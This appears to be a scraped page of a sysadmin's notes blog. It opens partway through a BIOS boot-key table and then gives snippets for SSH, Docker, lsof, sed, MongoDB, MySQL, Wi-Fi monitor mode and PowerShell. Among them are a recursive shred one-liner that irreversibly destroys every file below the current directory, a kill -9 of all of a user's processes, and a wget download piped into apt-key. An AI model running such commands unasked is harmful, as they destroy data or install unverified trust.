HP desktop Pavilion PC, p7 1297cb Esc Then F9 for "Boot Menu" Esc F10, Storage tab, Boot Order, Legacy Boot Sources
HP desktop TouchSmart 520 PC Esc Then F9 for "Boot Menu" Esc F10, Storage tab, Boot Order, Legacy Boot Sources
HP laptop 2000 Esc Then F9 for "Boot Menu". Select "Patriot Memory" on the Boot Option Menu. Esc Then F10, Storage tab, Boot Order, Legacy Boot Sources
HP notebook Pavilion g4 Esc F10 BIOS "Advanced" tab, Boot Order, Move "USB Device" before "Hard Drive"
HP notebook ENVY x2, m4, m4-1015dx, m4-1115dx, sleekbook m6, m6-1105dx, m6-1205dx, m6-k015dx, m6-k025dx, touchsmart m7 Esc Then F9 for "Boot Menu" Esc Then F10, Storage tab, Boot Order, Legacy Boot Sources
HP notebook Envy, dv6 and dv7 PC, dv9700, Spectre 14, Spectre 13 Esc Then F9 for "Boot Menu" Esc Then F10, Storage tab, Boot Order, Legacy Boot Sources
HP notebook 2000 - 2a20nr, 2a53ca, 2b16nr, 2b89wm, 2c29wm, 2d29wm Esc Then F9 for "Boot Menu" Esc Then F10, Storage tab, Boot Order, Legacy Boot Sources
HP notebook Probook 4520s, 4525s, 4540s, 4545s, 5220m, 5310m, 5330m, 5660b, 5670b Esc F10 BIOS "Advanced" tab, Boot Order, Move "USB Device" before "Hard Drive"
HP tower Pavilion a410n Esc F1 BIOS "Boot" tab, Boot Device Priority, Hard Drive Boot Priority, Move "USB-HDD0" up to #1 position.
Intel F10
Lenovo desktop F12, F8, F10 F1, F2
Lenovo laptop F12 F1, F2
Lenovo laptop ThinkPad edge, e431, e531, e545, helix, l440, l540, s431, t440s, t540p, twist, w510, w520, w530, w540, x140, x220, x230, x240, X1 carbon F12 F1
Lenovo laptop IdeaPad s300, u110, u310 Touch, u410, u510, y500, y510, yoga 11, yoga 13, z500 Novo button Small button on the side next to the power button. Novo button Small button on the side next to the power button.
Lenovo laptop IdeaPad P500 F12 or Fn + F11 F2
Lenovo netbook IdeaPad S10-3 F12 F2
Lenovo notebook g460, g470, g475, g480, g485 F12 F2
Packard Bell F8 F1, Del
Samsung F12, Esc
Samsung netbook NC10 Esc F2 Boot Tab, Select "Boot Device Priority", Press Return, Up/Down to Highlight, F6/F5 to change priority.
Samsung notebook np300e5c, np300e5e, np350v5c, np355v5c, np365e5c, np550p5c Esc F2 Boot Tab, Select "Boot Device Priority", Press Return, Up/Down to Highlight, F6/F5 to change priority.
Samsung ultrabook Series 5 Ultra, Series 7 Chronos, Series 9 Ultrabook Esc Note that you must first disable fast boot in BIOS/UEFI to boot from a USB drive. F2 Boot Tab, Select "Boot Device Priority", Press Return, Up/Down to Highlight, F6/F5 to change priority.
Samsung ultrabook Ativ Book 2, 8, 9 F2 Note that you must first disable fast boot in BIOS/UEFI to boot from a USB drive or use the F2 boot menu. F10 Boot Tab, Select "Boot Device Priority", Press Return, Up/Down to Highlight, F6/F5 to change priority.
Sharp F2
Sony VAIO Duo, Pro, Flip, Tap, Fit assist button assist button
Sony VAIO, PCG, VGN F11 F1, F2, F3
Sony VGN Esc, F10 F2 BIOS "BOOT" section, "External Device Boot" enabled
Toshiba laptop Kira, Kirabook 13, Ultrabook F12 F2
Toshiba laptop Qosmio g30, g35, g40, g50 F12 F2
Toshiba laptop Qosmio x70, x75, x500, x505, x870, x875, x880 F12 F2
Toshiba Protege, Satellite, Tecra F12 F1, Esc
Toshiba Equium F12 F12

Author: Harlok

2019-05-10 17:28:08

OpenSSH: Using a Bastion Host

Quick and dirty OpenSSH configlet. If you have a set of hosts or devices that require you to first jump through a bastion host, the following will let you reach them with a single ssh command:

Host *
ProxyCommand ssh -A <bastion_host> nc %h %p

Change the Host * line to best match the hostnames that require a bastion host.
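On OpenSSH 7.3 and newer, the same effect is available natively through the ProxyJump option, with no nc needed on the bastion; a minimal sketch, where the Host pattern and <bastion_host> are placeholders to adapt:

```
Host internal-*
    ProxyJump <bastion_host>
```

The one-off equivalent from the command line is ssh -J <bastion_host> <target_host>.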

Author: Harlok

2019-04-26 16:09:39

Cisco basic commands

Start with connecting :
telnet switch
ssh switch
To get admin privileges:
enable
Look at the config :
show run
See the log :
show log
Sneak a peek at the power supply, fan and temps :
show environment
Show the status of an interface :
show int ... status
Go to configuration mode :
conf t
int ...

Copy the configuration (running config to persistent memory):
copy running-config startup-config

Author: Harlok

2019-05-13 16:24:26

The difference from being sysadmin vs developer

When you're a developer, your boss wants you to do things quickly, even if they're buggy.
When you're a sysadmin, your boss wants you to do things right, even if it's slow.

Author: Harlok

2019-04-18 13:16:08

The ways to debug an exploding Docker container

Based on an article by Tim Perry.

Everything crashes.

Sometimes things crash when they’re running inside a Docker container though, and then all of a sudden it can get much more difficult to work out why, or what the hell to do next.

If you’re stuck in that situation, here are my go-to debugging commands to help you get a bit more information on what’s up:

  1. docker logs <container_id>

    Hopefully you’ve already tried this, but if not, start here. This’ll give you the full STDOUT and STDERR from the command that was run initially in your container.

  2. docker stats <container_id>
    If you just need to keep an eye on the metrics of your container to work out what’s gone wrong, docker stats can help: it’ll give you a live stream of resource usage, so you can see just how much memory you’ve leaked so far.

  3. docker cp <container_id>:/path/to/useful/file /local-path
    Often just getting hold of more log files is enough to sort you out. If you already know what you want, docker cp has your back: copy any file from any container back out onto your local machine, so you can examine it in depth (especially useful when analysing heap dumps).

  4. docker exec -it <container_id> /bin/bash
    Next up, if you can run the container (if it’s crashed, you can restart it with docker start <container_id>), shell in directly and start digging around for further details by hand.

  5. docker commit <container_id> my-broken-container && docker run -it my-broken-container /bin/bash
    Can’t start your container at all? If you’ve got an initial command or entrypoint that immediately crashes, Docker will immediately shut it back down for you. This can make your container unstartable, so you can’t shell in any more, which really gets in the way.
    Fortunately, there’s a workaround: save the current state of the shut-down container as a new image, and start that with a different command to avoid your existing failures.
    Have a failing entrypoint instead? There’s an entrypoint override command-line flag too.
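Step 5 as a concrete sketch (the container id and the image name my-broken-container are placeholders); the entrypoint override mentioned above is the --entrypoint flag:

```
# Snapshot the dead container's filesystem as a new image
docker commit <container_id> my-broken-container

# Start a shell instead of the failing command/entrypoint
docker run -it --entrypoint /bin/bash my-broken-container
```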

Author: Harlok

2019-04-17 08:33:25


lsof commands
lsof stands for List Open Files. It is easy to remember lsof command if you think of it as “ls + of”, where ls stands for list, and of stands for open files.
It is a command-line utility used to list information about the files opened by various processes. In Unix, everything is a file (pipes, sockets, directories, devices, etc.), so with lsof you can get information about any opened file.

1. Introduction to lsof

Simply typing lsof will provide a list of all open files belonging to all active processes.

# lsof
init 1 root cwd DIR 8,1 4096 2 /
init 1 root txt REG 8,1 124704 917562 /sbin/init
init 1 root 0u CHR 1,3 0t0 4369 /dev/null
init 1 root 1u CHR 1,3 0t0 4369 /dev/null
init 1 root 2u CHR 1,3 0t0 4369 /dev/null
init 1 root 3r FIFO 0,8 0t0 6323 pipe

By default, one file is displayed per line. Most of the columns are self-explanatory. We will explain the details of a couple of cryptic columns (FD and TYPE).

FD – Represents the file descriptor. Some of the values of FDs are,

  • cwd – Current Working Directory

  • txt – Program text (code and data)

  • mem – Memory mapped file

  • mmap – Memory mapped device

  • NUMBER – Represents the actual file descriptor. The character after the number, e.g. ‘1u’, represents the mode in which the file is opened: r for read, w for write, u for read and write.

TYPE – Specifies the type of the file. Some of the values of TYPEs are,

  • REG – Regular File

  • DIR – Directory

  • FIFO – First In First Out

  • CHR – Character special file

For a complete list of FD & TYPE, refer man lsof.

2. List processes which opened a specific file

You can list only the processes which opened a specific file by providing the filename as an argument.

# lsof /var/log/syslog
rsyslogd 488 syslog 1w REG 8,1 1151 268940 /var/log/syslog

3. List opened files under a directory

You can list the processes which opened files under a specified directory using the ‘+D’ option. +D recurses into subdirectories as well; if you don’t want lsof to recurse, use the ‘+d’ option.

# lsof +D /var/log/
rsyslogd 488 syslog 1w REG 8,1 1151 268940 /var/log/syslog
rsyslogd 488 syslog 2w REG 8,1 2405 269616 /var/log/auth.log
console-k 144 root 9w REG 8,1 10871 269369 /var/log/ConsoleKit/history

4. List opened files based on process names starting with

You can list the files opened by processes whose names start with a given string, using the ‘-c’ option. -c followed by a string lists the files opened by processes whose name starts with that string. You can give multiple -c switches on a single command line.

# lsof -c ssh -c init
init 1 root txt REG 8,1 124704 917562 /sbin/init
init 1 root mem REG 8,1 1434180 1442625 /lib/i386-linux-gnu/
init 1 root mem REG 8,1 30684 1442694 /lib/i386-linux-gnu/
ssh-agent 1528 lakshmanan 1u CHR 1,3 0t0 4369 /dev/null
ssh-agent 1528 lakshmanan 2u CHR 1,3 0t0 4369 /dev/null
ssh-agent 1528 lakshmanan 3u unix 0xdf70e240 0t0 10464 /tmp/ssh-sUymKXxw1495/agent.1495

5. List processes using a mount point

Sometimes when we try to umount a directory, the system reports a “Device or Resource Busy” error. We then need to find out which processes are using the mount point and kill them in order to umount the directory. Using lsof we can find those processes.

# lsof /home

The following will also work.

# lsof +D /home/

6. List files opened by a specific user

In order to find the list of files opened by a specific users, use ‘-u’ option.

# lsof -u lakshmanan
update-no 1892 lakshmanan 20r FIFO 0,8 0t0 14536 pipe
update-no 1892 lakshmanan 21w FIFO 0,8 0t0 14536 pipe
bash 1995 lakshmanan cwd DIR 8,1 4096 393218 /home/lakshmanan

Sometimes you may want to list files opened by all users except one or two. In that case you can use ‘^’ to exclude only those particular users as follows

# lsof -u ^lakshmanan
rtkit-dae 1380 rtkit 7u 0000 0,9 0 4360 anon_inode
udisks-da 1584 root cwd DIR 8,1 4096 2 /

The above command listed all the files opened by all users, except user ‘lakshmanan’.

7. List all open files by a specific process

You can list all the files opened by a specific process using ‘-p’ option. It will be helpful sometimes to get more information about a specific process.

# lsof -p 1753
bash 1753 lakshmanan cwd DIR 8,1 4096 393571 /home/lakshmanan/test.txt
bash 1753 lakshmanan rtd DIR 8,1 4096 2 /
bash 1753 lakshmanan 255u CHR 136,0 0t0 3 /dev/pts/0

8. Kill all process that belongs to a particular user

When you want to kill all the processes that have files opened by a specific user, you can use the ‘-t’ option to output only the process IDs, and pass the list to kill as follows

# kill -9 `lsof -t -u lakshmanan`

The above command will kill all processes belonging to user ‘lakshmanan’ that have files open.

Similarly, you can use ‘-t’ in many other ways. For example, to list the process id of the process which opened /var/log/syslog:

# lsof -t /var/log/syslog


9. Combine more list options using OR/AND

By default when you use more than one list option in lsof, they will be ORed. For example,

# lsof -u lakshmanan -c init
init 1 root cwd DIR 8,1 4096 2 /
init 1 root txt REG 8,1 124704 917562 /sbin/init
bash 1995 lakshmanan 2u CHR 136,2 0t0 5 /dev/pts/2
bash 1995 lakshmanan 255u CHR 136,2 0t0 5 /dev/pts/2

The above command uses two list options, ‘-u’ and ‘-c’. So the command will list processes belonging to user ‘lakshmanan’ as well as processes whose name starts with ‘init’.

But when you want to list processes that belong to user ‘lakshmanan’ and whose name starts with ‘init’, you can use the ‘-a’ option.

# lsof -u lakshmanan -c init -a

The above command will not output anything, because there is no such process named ‘init’ belonging to user ‘lakshmanan’.

10. Execute lsof in repeat mode

lsof also supports a repeat mode: it first lists files based on the given parameters, delays for the specified number of seconds, then lists the files again. It can be interrupted by a signal.

Repeat mode can be enabled by using ‘-r’ or ‘+r’. With ‘+r’, repeat mode ends when no open files are found; ‘-r’ keeps the list/delay/list cycle going until it is interrupted, whether or not any files are open.

Each cycle's output is separated by ‘=======’. You can also specify the time delay as ‘-r<seconds>’ or ‘+r<seconds>’.

# lsof -u lakshmanan -c init -a -r5

COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
2971 lakshmanan cwd DIR 8,1 4096 393218 /home/lakshmanan
2971 lakshmanan rtd DIR 8,1 4096 2 /
2971 lakshmanan txt REG 8,1 83848 524315 /bin/dash
2971 lakshmanan mem REG 8,1 1434180 1442625 /lib/i386-linux-gnu/
2971 lakshmanan mem REG 8,1 117960 1442612 /lib/i386-linux-gnu/
2971 lakshmanan 0u CHR 136,4 0t0 7 /dev/pts/4
2971 lakshmanan 1u CHR 136,4 0t0 7 /dev/pts/4
2971 lakshmanan 2u CHR 136,4 0t0 7 /dev/pts/4
2971 lakshmanan 10r REG 8,1 20 393578 /home/lakshmanan/

In the above output, there is no output for the first 5 seconds. After that, a shell script is started, and its open files are listed.

Finding Network Connection

Network connections are also files. So we can find information about them by using lsof.

11. List all network connections

You can list all the open network connections by using the ‘-i’ option.

# lsof -i
avahi-dae 515 avahi 13u IPv4 6848 0t0 UDP *:mdns
avahi-dae 515 avahi 16u IPv6 6851 0t0 UDP *:52060
cupsd 1075 root 5u IPv6 22512 0t0 TCP ip6-localhost:ipp (LISTEN)

You can also use ‘-i4’ or ‘-i6’ to list only ‘IPV4’ or ‘IPV6‘ respectively.

12. List all network files in use by a specific process

You can list all the network files in use by a specific process as follows

# lsof -i -a -p 234

You can also use the following

# lsof -i -a -c ssh

The above command will list the network files opened by the processes starting with ssh.

13. List processes which are listening on a particular port

You can list the processes listening on a particular port by using ‘-i’ with ‘:port’ as follows

# lsof -i :25
exim4 2541 Debian-exim 3u IPv4 8677 TCP localhost:smtp (LISTEN)

14. List all TCP or UDP connections

You can list all the TCP or UDP connections by specifying the protocol using ‘-i’.

# lsof -i tcp; lsof -i udp;

15. List all Network File System ( NFS ) files

You can list all the NFS files by using ‘-N’ option. The following lsof command will list all NFS files used by user ‘lakshmanan’.

# lsof -N -u lakshmanan -a


Author: Harlok

2019-05-11 21:10:25

Docker start stop restart all containers

Restart all running containers:
docker restart $(docker ps -q)
Stop all running containers:
docker stop $(docker ps -q)
Restart all containers (running and stopped):
docker restart $(docker ps -a -q)
Stop all containers (running and stopped):
docker stop $(docker ps -a -q)
To start only stopped containers:
docker start $(docker ps -a -q -f status=exited)
Bash into the container :
docker exec -it container /bin/bash
docker exec -it container /bin/sh
Show lsof of a container :
lsof -U | grep containerid

Author: Harlok

2020-10-16 13:34:51

Reverse cat (concatenate) a Text File

From the tac manpage: tac – concatenate and print files in reverse

So, the next time you want to see the contents of a text file, but want to see the newest content first, tac is the command you need:

tac filename.log

Or, as you’ll probably need (to stop the output flooding the screen), you can pipe it to more, just as you can with a normal cat.

tac filename.log | more
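A quick check of the behaviour (assuming GNU coreutils tac):

```shell
# write three lines, then print them newest-first
printf 'line1\nline2\nline3\n' > /tmp/tac-demo.log
tac /tmp/tac-demo.log
# line3
# line2
# line1
```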

Author: Harlok

2019-04-05 15:20:43


grep exclude -v

tail -f access.log | grep -v ""

What this will do is show everything apart from lines containing that IP address.

Of course, this works with any other command with text being piped into grep:

cat file.txt | grep -v "heh"

This would output the contents of file.txt but remove any lines with “heh” in them.

To make a grep case-insensitive, simply add -i:

grep -i "Hello" textfile.txt

Alternatively, you could use it in conjunction with cat and tac (Reverse Cat)

cat textfile.txt | grep -i "Hello"
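Combining -v and -i drops every line containing the pattern, in any case; a small self-contained check:

```shell
# keep only lines that do NOT contain "hello" (case-insensitively)
printf 'Hello world\ngoodbye world\n' | grep -vi hello
# goodbye world
```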

Author: Harlok

2019-04-05 15:24:14

After compiling php

Check the extension dir:
php -i | grep extension_dir

Check the Apache module:
apachectl -M | grep -i php

Author: Harlok

2019-04-03 10:27:38

How much data in MyISAM and InnoDB

SELECT IFNULL(B.engine,'Total') "Storage Engine",
CONCAT(LPAD(REPLACE(FORMAT(B.DSize/POWER(1024,pw),3),',',''),17,' '),' ',
SUBSTR(' KMGTP',pw+1,1),'B') "Data Size", CONCAT(LPAD(REPLACE(
FORMAT(B.ISize/POWER(1024,pw),3),',',''),17,' '),' ',
SUBSTR(' KMGTP',pw+1,1),'B') "Index Size", CONCAT(LPAD(REPLACE(
FORMAT(B.TSize/POWER(1024,pw),3),',',''),17,' '),' ',
SUBSTR(' KMGTP',pw+1,1),'B') "Table Size"
FROM (SELECT engine,SUM(data_length) DSize,SUM(index_length) ISize,
SUM(data_length+index_length) TSize FROM information_schema.tables
WHERE table_schema NOT IN ('mysql','information_schema','performance_schema')
GROUP BY engine WITH ROLLUP) B, (SELECT 3 pw) A WHERE B.engine IS NOT NULL;

Author: Harlok

2019-04-16 22:09:40

Some useful sed command

Remove all empty lines:
sed '/^$/d'
In vim:
:g/^$/d
Remove leading spaces and tabs:
sed 's/^[ \t]*//g'

Remove all line returns (join all lines into one):
sed ':a;N;$!ba;s/\n//g'

Append a line after every line matching the pattern:
sed '/Sysadmin/a \ text' file

Insert Lines:
sed 'ADDRESS i\ text' file

Append at the end of line matching
sed 's/match.*/& text/' abcd.txt

Insert at the beginning:
sed 's/^/text/'

Append at the end:
sed 's/$/text/'

Remove the last character of each line:
sed 's/.$//'

Remove ^M in vim:
:%s/\r//g
With tr :
tr "\r" "\n"
And with sed :
sed -i -e 's/\r//g'

remove space at the beginning :
sed 's/^ *//g'

The following command deletes any trailing whitespace at the end of each line in vim:
:%s/\s\+$//e
Sed directly in a file (in place):
sed -i 's/old/new/g' file
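A few of the commands above, run against inline input to show their effect:

```shell
# delete empty lines
printf 'a\n\nb\n' | sed '/^$/d'
# a
# b

# strip leading spaces and tabs
printf '   indented\n' | sed 's/^[ \t]*//'
# indented

# append text at the end of every line
printf 'x\n' | sed 's/$/-suffix/'
# x-suffix
```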

Author: Harlok

2020-07-11 21:02:23

The tar linux command syntax

Tar Usage and Options

c – create an archive file.
x – extract an archive file.
v – show the progress of the archive file.
f – filename of the archive file.
t – view the contents of an archive file.
j – filter the archive through bzip2.
z – filter the archive through gzip.
r – append or update files or directories in an existing archive file.
W – verify an archive file.
wildcards – specify patterns in the unix tar command.

examples :
- extract :
tar -xvf file.tar
- create :
tar -cvf archive.tar /path/tofile
- with compression :
tar -cvjf archive.tar.bz2 /path/tofile
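A round trip with the flags above (the paths are just an example):

```shell
# set up a file to archive
mkdir -p /tmp/tar-demo && echo hello > /tmp/tar-demo/file.txt
# create a gzip-compressed archive
tar -czf /tmp/tar-demo.tar.gz -C /tmp/tar-demo file.txt
# view its contents
tar -tzf /tmp/tar-demo.tar.gz
# file.txt
```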

Author: Harlok

2019-05-04 21:52:24

Shred Files

This command finds all files under the current directory and its subdirectories (-type f) and pipes them (via xargs or -exec) to shred (-n 48: 48 overwrite iterations, -z: finish with a pass of zeros, -u: remove the file, -v: verbose, -f: force)
find . -type f -print0 | xargs -0 shred -fuzv -n 48
find . -type f -exec shred -fuzv -n 48 {} \;

Author: Harlok

2019-05-13 16:31:48

Commands - Mongodb

mongod --config "config.file"
mongod -f "config.file"

Status :
show dbs
load() Executes a specified javascript file.

auth :
mongo admin -u root -p
use admin

list users :
show users
db.createUser({"user": "ajitesh", "pwd": "gurukul", "roles": ["readWrite", "dbAdmin"]})

show roles :

list collections:
show collections
db.<collection>.dataSize() // Size of the collection
db.<collection>.storageSize() // Total size of documents stored in the collection
db.<collection>.totalSize() // Total size in bytes of both collection data and indexes
db.<collection>.totalIndexSize() // Total size of all indexes in the collection

User management commands :

Collection management commands :

Database management commands :

Database status command :

Creating an index with a database command:
db.runCommand({
"createIndexes": "<collection>",
"indexes": [ { "key": { "product": 1 }, "name": "name_index" } ]
})

Creating an index with the shell helper:
db.<collection>.createIndex(
{ "product": 1 },
{ "name": "name_index" }
)

Introspect a Shell Helper :

Get the logging components:

mongo admin --host -u m103-admin -p m103-pass --eval '
db.getLogComponents()
'

Change the logging level:

mongo admin --host -u m103-admin -p m103-pass --eval '
db.setLogLevel(0, "index")
'

Tail the log file:

tail -f /data/db/mongod.log

Update a document:

mongo admin --host -u m103-admin -p m103-pass --eval '
db.products.update( { "sku" : 6902667 }, { $set : { "salePrice" : 39.99} } )
'

Look for instructions in the log file with grep:

grep -R 'update' /data/db/mongod.log


Adding other members to the replica set:
rs.add("<hostname>:<port>")

Getting an overview of the replica set topology:
rs.status()

Stepping down the current primary:
rs.stepDown()

Checking replica set overview after the election:
rs.isMaster()

Switch to config DB :
use config

Query config.databases:
db.databases.find().pretty()


Query config.collections:
db.collections.find().pretty()


Query config.shards:
db.shards.find().pretty()


Query config.chunks:
db.chunks.find().pretty()


Query config.mongos:
db.mongos.find().pretty()


Modify multiple roles for a user:

var myuser = 'exemple';
var myre = /^exemple_dbs_.*/;
db.adminCommand({ listDatabases: 1 }).databases.forEach(function(mydb) {
if (mydb['name'].match(myre)) {
db.grantRolesToUser(myuser, [ { role: "dbOwner", db: mydb['name'] } ] );
}
});

Modify a Role for Multiple Users

db.system.users.find({ "user": /^user_/ }).forEach(function(myuser) { db.grantRolesToUser(myuser["user"], [ { role: "dbOwner", db: "" } ] ); });

Profiling slow queries
for a db:
use db
db.setProfilingLevel(0, { slowms: 150 })

for a complete instance :
mongod --profile 1 --slowms 15 --slowOpSampleRate 0.5

Author: Harlok

2020-03-20 09:05:15

Sed one liners

Find every file from the current folder and replace string :
find ./ -type f -exec sed -i 's/string1/string2/g' {} \;

Grep every file containing matchstring and replace string1 with string2:
grep -rl matchstring somedir/ | xargs sed -i 's/string1/string2/g'

Grep every file recursively from the current folder which contains the word foo, excluding filenames containing bar, and replace string:
grep -rl foo . | grep -v bar | xargs sed -i 's/string1/string2/g'
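The grep/xargs/sed pipeline in action against a throwaway directory:

```shell
dir=$(mktemp -d)
printf 'string1 here\n' > "$dir/a.txt"
printf 'nothing to do\n' > "$dir/b.txt"
# only files that actually contain string1 are rewritten
grep -rl string1 "$dir" | xargs sed -i 's/string1/string2/g'
cat "$dir/a.txt"
# string2 here
```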

Author: Harlok

2020-10-13 23:00:57

awk commands

Sum the values in the second column:
awk '{total+=$2} END {print total}'
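This sums the second whitespace-separated column of its input; for example:

```shell
# 3 + 4 + 5 = 12
printf 'apples 3\noranges 4\npears 5\n' | awk '{total+=$2} END {print total}'
# 12
```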

Author: Harlok

2018-12-14 14:02:13

Identifying MySQL Slow Queries

One of the most important steps in optimizing and tuning mysql is to identify the queries that are causing problems. How can we find out what queries are taking a long time to complete? How can we see what queries are slowing down the mysql server? Mysql has the answer for us and we only need to know where to look for it… Normally from my experience if we take the most ‘expensive’ 10 queries and we optimize them properly (maybe running them more efficiently, or maybe they are just missing a simple index to perform properly), then we will immediately see the result on the overall mysql performance. Then we can iterate this process and optimize the new top 10 queries. This article shows how to identify those ‘slow’ queries that need special attention and proper optimization.
1. Activate the logging of mysql slow queries.

The first step is to make sure that the mysql server will log ‘slow’ queries and to properly configure what we are considering as a slow query.

First let’s check on the mysql server if we have slow query logging enabled:

mysqladmin var |grep log_slow_queries
| log_slow_queries | OFF |

If log_slow_queries is ON then we already have it enabled. This setting is by default disabled – meaning that if you don’t have log_slow_queries defined in the mysql server config this will be disabled. The mysql variable long_query_time (default 1) defines what is considered as a slow query. In the default case, any query that takes more than 1 second will be considered a slow query.

Ok, now for the scope of this article we will enable the mysql slow query log. In order to do this, add the following to the mysqld section of your mysql server config file (/etc/my.cnf on RHEL/CentOS, /etc/mysql/my.cnf on Debian, etc.):

long_query_time = 1
log-slow-queries = /var/log/mysql/mysql-slow.log

(On MySQL 5.6 and later, log-slow-queries was removed; use slow_query_log = 1 and slow_query_log_file = /var/log/mysql/mysql-slow.log instead.)

This configuration will log all queries that take more than 1 sec in the file /var/log/mysql/mysql-slow.log. You will probably want to define these based on your particular setup (maybe you will want the logs in a different location and/or you will consider a higher value than 1 sec to be slow query).

Once you have done the proper configurations to enable mysql to log slow queries you will have to reload the mysql service in order to activate the changes.
2. Investigate the mysql slow queries log.

After we have enabled slow query logging, we can look inside the log file for each slow query executed by the server. Various details are logged to help us understand how the query was executed:

Time: how long it took to execute the query
Lock: how long was a lock required
Rows: how many rows were investigated by the query (this can help see quickly queries without indexes)
Host: the actual host that launched the query (this can be localhost, or a different one in multiple servers setup)
The actual mysql query.

This information allows us to see which queries need to be optimized, but on a high-traffic server with lots of slow queries this log can grow very fast, making it difficult to find any relevant information inside it. In this case we have two choices:

We increase the long_query_time and we focus on the queries that take the most time to complete, and we gradually decrease this once we solve the queries.
We use some sort of tool to parse the slow query log file and have it show us the most used queries.

Of course based on the particular setup we might end up using both methods.

MySQL gives us a small tool that does exactly this: mysqldumpslow. This parses and summarizes the MySQL slow query log. From the manual page here are the options we can use:

-v           verbose
-d           debug
-s ORDER     what to sort by (t, at, l, al, r, ar etc)
-r           reverse the sort order (largest last instead of first)
-t NUM       just show the top n queries
-a           don't abstract all numbers to N and strings to 'S'
-n NUM       abstract numbers with at least n digits within names
-g PATTERN   grep: only consider stmts that include this string
-h HOSTNAME  hostname of db server for *-slow.log filename (can be wildcard)
-i NAME      name of server instance (if using mysql.server startup script)
-l           don't subtract lock time from total time

For example using:

mysqldumpslow -s c -t 10

we get the top 10 queries (-t 10) sorted by the number of occurrences in the log (-s c). Now it is time to have those queries optimized. This is outside of the scope of this article but the next logical step is to run EXPLAIN on the mysql query and then, based on the particular query to take the appropriate actions to fix it.

Author: Harlok

2019-04-16 22:09:27

mysqldumpslow examples
mysqldumpslow -s c -t 10 /var/log/mysql_slow_queries.log

mysqldumpslow – Summarize slow query log files

mysqldumpslow [options] [log_file …]

The MySQL slow query log contains information about queries that take a long time to execute (see Section 5.2.5, “The Slow Query Log”).
mysqldumpslow parses MySQL slow query log files and prints a summary of their contents.

Normally, mysqldumpslow groups queries that are similar except for the particular values of number and string data values. It “abstracts” these values to N and ‘S’ when displaying summary output. The -a and -n options can be used to modify value abstracting behavior.

Invoke mysqldumpslow like this:

shell> mysqldumpslow [options] [log_file ...]

mysqldumpslow supports the following options.

· --help

Display a help message and exit.

· -a

Do not abstract all numbers to N and strings to ‘S’.

· --debug, -d

Run in debug mode.

· -g pattern

Consider only queries that match the (grep-style) pattern.

· -h host_name

Host name of MySQL server for *-slow.log file name. The value can contain a wildcard. The default is * (match all).

· -i name

Name of server instance (if using mysql.server startup script).

· -l

Do not subtract lock time from total time.

· -n N

Abstract numbers with at least N digits within names.

· -r

Reverse the sort order.

· -s sort_type

How to sort the output. The value of sort_type should be chosen from the following list:

· t, at: Sort by query time or average query time

· l, al: Sort by lock time or average lock time

· r, ar: Sort by rows sent or average rows sent

· c: Sort by count

By default, mysqldumpslow sorts by average query time (equivalent to -s at).

· -t N

Display only the first N queries in the output.

· --verbose, -v

Verbose mode. Print more information about what the program does.

Auteur : Harlok

2019-04-16 22:09:06

php errors

ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);

Auteur : Harlok

2018-11-22 08:49:52

Wifi commands

rfkill:

list [id|type ...]
List the current state of all available devices. The command output format is
deprecated, see the section DESCRIPTION. It is a good idea to check with the list
command that the id or type scope is appropriate before setting block or unblock.
The special "all" type string will match everything. Use of multiple id or type
arguments is supported.

block id|type [...]
Disable the corresponding device.

unblock id|type [...]
Enable the corresponding device. If the device is hard-blocked, for example via a
hardware switch, it will remain unavailable though it is now soft-unblocked.

iw dev                                        # list wireless interfaces
iw phy phy0 info                              # show the capabilities of phy0
iw phy phy0 interface add mon0 type monitor   # add a monitor-mode interface
iw dev wlan0 del                              # remove the managed interface
ifconfig mon0 up                              # bring the monitor interface up

Auteur : Harlok

2018-10-05 09:44:37

Kali nethunter invalid key

wget -q -O - | apt-key add -

Auteur : Harlok

2018-09-27 19:20:32

Ten PowerShell commands

Computer running Windows Vista (or higher)
Server running Windows Server 2008 (or higher)
PowerShell 5.0
Administrative access
1: Create a PowerShell session
Command: Enter-PSSession

Example: Enter-PSSession -ComputerName REMOTE_COMPUTER_NAME -Credential USERNAME

Creating a PSSession will allow an administrator to remotely connect to a computer on the network and run any number of PS commands on the device. During the session, multiple commands may be executed remotely, since the admin has console access just as though he/she were sitting locally at the machine.

2: Execute commands

Command: Invoke-Command

Example: Invoke-Command -ComputerName REMOTE_COMPUTER_NAME -ScriptBlock {PowerShell Command}

Using Invoke-Command in PS renders similar results to executing a session as in command #1 above, except that when using Invoke to call forth a command remotely, only one command may be executed at a time. This prevents running multiple commands together unless they are saved as a .PS1 file and the script itself is invoked.

3: Restart computer(s)
Command: Restart-Computer

Example: Restart-Computer -ComputerName REMOTE_COMPUTER_NAME -Force

Sometimes installations or configurations will require a reboot to work properly. Other times, a computer just needs a refreshing of the resources, and a reboot will accomplish that. Whether targeted at one or one hundred devices, PS can ease the job with just one command for all.

4: Ping computer(s)
Command: Test-Connection


The PING command is one of the most useful commands in a sysadmin's arsenal. Simply put, it tests connectivity between your current station and another remote system. Test-Connection brings it up a notch by folding that functionality into a PS cmdlet, while adding some new tricks—such as being able to designate a source computer that's different from the one you're currently logged onto. Say you need to test communications between a server and a remote device. The ICMP requests will be sent from the server to the remote device, yet report the findings back to your admin station.

5: View and modify services
Command: Set-Service


Services are resilient and sometimes finicky. Depending on what's going on with a particular computer, they may halt at the worst possible time. Determining a station's running services begins with the Get-Service cmdlet to obtain current statuses. Once that information is available, the process to set a service status is possible - be it for one service, those that begin with the letter W, or all of them at once.

6: Run background tasks
Command: Start-Job

Example: Start-Job -FilePath PATH_TO_SCRIPT.PS1

Some administrators do what they need to do when they need to do it, regardless of what's going on or what the users are doing. Others prefer to work in the shadows to keep things humming along with little to no interruptions. If you're one of the latter, this cmdlet is perfect for your management style.

It executes scripts or tasks in the background no matter who is interactively logged on or what they may be doing. Further, it will execute silently—even if it were to fail—and not interrupt the locally logged on user at all. Like a ghost!

7: Shut down computer(s)
Command: Stop-Computer

Example: Stop-Computer -ComputerName REMOTE_COMPUTER_NAME -Force

Unlike running things silently or rebooting a desktop from afar, there are times when computers need to be shut down. For these moments, this cmdlet will ensure that one or all computers are properly shut down and will even log off interactive users if the -Force argument is included.

8: Join computers to a domain
Command: Add-Computer

Example: Add-Computer -ComputerName COMPUTER_NAMES_TO_BE_JOINED -DomainName DOMAIN.COM -Credential DOMAIN\USER -Restart

While the process of joining a computer to a domain is fairly straightforward, the three clicks and entering of admin credentials can become quite tedious when multiplied by several hundreds of computers at a time.

PowerShell can make short work of the task. This cmdlet allows for multiple computers at once to be joined to a domain, while requiring the admin to enter his/her credentials only once.

